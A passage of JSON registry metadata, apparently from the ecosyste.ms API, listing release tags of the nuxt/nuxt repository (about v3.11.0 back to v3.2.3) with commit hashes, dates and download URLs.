1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0/manifests"},{"name":"v3.10.3","sha":"aaad9924339b4c45d7feb45ed84bac4052edfcf0","kind":"commit","published_at":"2024-02-22T13:56:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3/manifests"},{"name":"v3.10.2","sha":"ceebcde36642fd3711a2567658cb1337a0475153","kind":"commit","published_at":"2024-02-14T13:00:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2/manifests"},{"name":"v3.10.1","sha":"460e0cfebd0ad19c7928c8d986e59f93a1bba1a3","kind":"commit","published_at":"2024-02-05T16:48:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1/manifests"},{"name":"v3.10.0","sha":"da3c502f08587f93e1134bc8e7aea1dee8d628fb","kind":"commit","published_at":"2024-01-30T15:25:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0/manifests"},{"name":"v3.9.3","sha":"fd8b263326c8703815a7e043948c22a8e5b969e2","kind":"commit","published_at":"2024-01-17T14:19:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3/manifests"},{"name":"v3.9.2","sha":"97ed2df423ebd8038f16d81e00cd2836ba2d712a","kind":"commit","published_at":"2024-01-16T17:00:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2/manifests"},{"name":"v2.17.3","sha":"4aa989d68a1934bd107fc5ad4e87549d39277ecd","kind":"tag","published_at":"2024-01-12T15:13:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3/manifests"},{"name":"v3.9.1","sha":"6736decba0dc8bbc7276848a8a26973440ebdee4","kind":"commit","published_at":"2024-01-05T21:55:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"c28ef02a1779b1c8a30c3daa2049d3c81a88ac91","kind":"commit","published_at":"2023-12-25T17:24:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0/manifests"},{"name":"v3.8.2","sha":"8d1fc6c4a9b0f6a662a006489162e66fdeb677b1","kind":"commit","published_at":"2023-11-20T22:22:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2/manifests"},{"name":"v3.8.1","sha":"d8674b99820d0e4dd620b20d38efb2ee52c80e52","kind":"commit","published_at":"2023-11-06T11:54:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1/manifests"},{"name":"v2.17.2","sha":"2080d82471962a5a6ea2c7b38c8975c961e919f8","kind":"tag","published_at":"2023-10-24T03:05:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2/manifests"},{"name":"v3.8.0","sha":"59ff865b133aaf82876f73b2d0566a00081b2795","kind":"commit","published_at":"2023-10-19T15:21:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0/manifests"},{"name":"v3.7.4","sha":"5abd8a231f26a2e08071a59caa87b80eaaa6cd91","kind":"commit","published_at":"2023-09-26T00:18:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4/manifests"},{"name":"v3.7.3","sha":"16e40f899e753208dd270c30869d240fbff0b8a2","kind":"commit","published_at":"2023-09-13T22:52:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3/manifests"},{"name":"v3.7.2","sha":"ebacf199fe52b9dfd5cb48f2f4735df0e9adbaac","kind":"commit","published_at":"2023-09-12T21:35:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2/manifests"},{"name":"v3.7.1","sha":"88a6d0a499cc7696bff94c02548cd9cc60f7820b","kind":"commit","published_at":"2023-09-05T13:49:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"9013f88e75f499e650463e3c80d116d0ce898a14","kind":"commit","published_at":"2023-08-25T23:26:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0/manifests"},{"name":"@nuxt/ui-templates@1.3.1","sha":"26a0745b9cc3a60aa8bf86c74ab3ff7ec4717058","kind":"tag","published_at":"2023-07-29T03:33:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.1/manifests"},{"name":"@nuxt/ui-templates@1.3.0","sha":"039126dac7070eeae2eae16fcb423f6b77a4fc0d","kind":"tag","published_at":"2023-07-28T16:37:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.0/manifests"},{"name":"@nuxt/ui-templates@1.2.1","sha":"57e237b03ecb63319727dd407f01be6c6540deab","kind":"tag","published_at":"2023-07-26T09:19:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.1/manifests"},{"name":"v3.6.5","sha":"f6a3adb52156774ab372829a2ee2533906758288","kind":"commit","published_at":"2023-07-19T17:40:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5/manifests"},{"name":"v3.6.4","sha":"380a91985c350281aba2d8eb16c65b0ebc39ea8b","kind":"commit","published_at":"2023-07-19T15:19:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4/manifests"},{"name":"v3.6.3","sha":"f068ad5edda4aaf79906a58ab472c9c3c0f564f1","kind":"commit","published_at":"2023-07-14T22:48:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3/manifests"},{"name":"v2.17.1","sha":"9de25afa865ca6861a7bb6e3b6b89df56616d93d","kind":"tag","published_at":"2023-07-14T22:35:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1/manifests"},{"name":"v3.6.2","sha":"88f914e9a01cb8ed196afb653dbcb4f7a5123b15","kind":"commit","published_at":"2023-07-05T21:42:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2/manifests"},{"name":"v3.6.1","sha":"54a0d5e8dc2184f995169e6b4c5adaba9cffaa6c","kind":"commit","published_at":"2023-06-26T19:25:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1/manifests"},{"name":"v3.6.0","sha":"e58cfc81f03a2323c95e6671af7deb4c4288bf39","kind":"commit","published_at":"2023-06-23T12:06:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0/manifests"},{"name":"@nuxt/ui-templates@1.2.0","sha":"5f6e505ea476ed8ede4edbd4d1fb3dcae0189705","kind":"tag","published_at":"2023-06-20T11:29:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.0/manifests"},{"name":"v2.17.0","sha":"1ce34ec2c438fbad9a04f7eda2ce4f439389ea9a","kind":"tag","published_at":"2023-06-09T20:51:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0/manifests"},{"name":"v3.5.3","sha":"199595f3afac38b2a41be0a1c5593a8b6ea03366","kind":"commit","published_at":"2023-06-06T00:24:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"d85348987f8fd0e36763de69d6c665b630532429","kind":"commit","published_at":"2023-05-29T11:48:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"f13ccfe8363e3ababea7379d07822953eea555aa","kind":"commit","published_at":"2023-05-21T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"9683c3dad3fc31d5a2f780f6e7e785c1eeedc797","kind":"commit","published_at":"2023-05-16T13:29:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0/manifests"},{"name":"v3.4.3","sha":"1464294d6abe13b54fdb8d204732345551c8e647","kind":"commit","published_at":"2023-04-28T19:08:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3/manifests"},{"name":"v3.4.2","sha":"607bfdcfefe3520c89202fe5a5525794792192d7","kind":"commit","published_at":"2023-04-20T13:51:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2/manifests"},{"name":"v3.4.1","sha":"940fb0b7ad73960257f3e5f868186c302308e43b","kind":"commit","published_at":"2023-04-13T10:31:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"25e3a9046cc1b3dd9c1bf2c188a627b0a9446ad2","kind":"commit","published_at":"2023-04-11T16:17:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0/manifests"},{"name":"v3.3.3","sha":"8e9d7157a8d4fae6d2d0ae4598dd7c2ae14e5571","kind":"commit","published_at":"2023-04-02T14:14:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"dd6f9c01ccea00ddb37d15ce1773a054b99f08db","kind":"commit","published_at":"2023-03-24T18:31:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2/manifests"},{"name":"v2.16.3","sha":"6ca842e36ed935950608f02b539fc2985f5f3ef9","kind":"tag","published_at":"2023-03-17T15:39:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3/manifests"},{"name":"v3.3.1","sha":"184d57bb1923b8bf21a372eabdb67e1241d2023f","kind":"commit","published_at":"2023-03-14T14:45:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"2ebf5f4c4488c911e8bcc273cb8b12b86bf3562e","kind":"commit","published_at":"2023-03-14T13:22:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0/manifests"},{"name":"v2.16.2","sha":"ca8b375e2eb38c452b1b227e83c2cdad6de2f030","kind":"tag","published_at":"2023-03-01T13:03:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2/manifests"},{"name":"v3.2.3","sha":"021ba4310e47301996967c2a9b581152095cb995","kind":"commit","published_at":"2023-02-28T11:19:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitH